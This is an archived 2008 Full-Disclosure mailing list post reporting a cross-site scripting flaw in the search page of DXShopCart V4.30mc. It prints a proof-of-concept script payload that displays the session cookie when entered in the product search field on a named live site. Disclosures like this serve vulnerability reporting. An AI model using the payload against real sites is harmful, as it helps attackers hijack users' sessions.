full-disclosure-uk August 2008 archive

[Full-disclosure] DXShopCart V4.30mc search.php XSS

From: bug squash <bugsquashr_at_nospam>
Date: Thu Aug 21 2008 - 19:52:43 GMT
To: full-disclosure@lists.grok.org.uk


###################################

DXShopCart V4.30mc search.php XSS
###################################

Author: d00m3d! Chik3n hUnT3r 666
email: bugsquashr@gmail.com

Example:
<script>alert(document.cookie)</script>

in the product search on http://www.scripts4profit.net/ShopCartDX/index.php

click submit - doh!

###################################



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/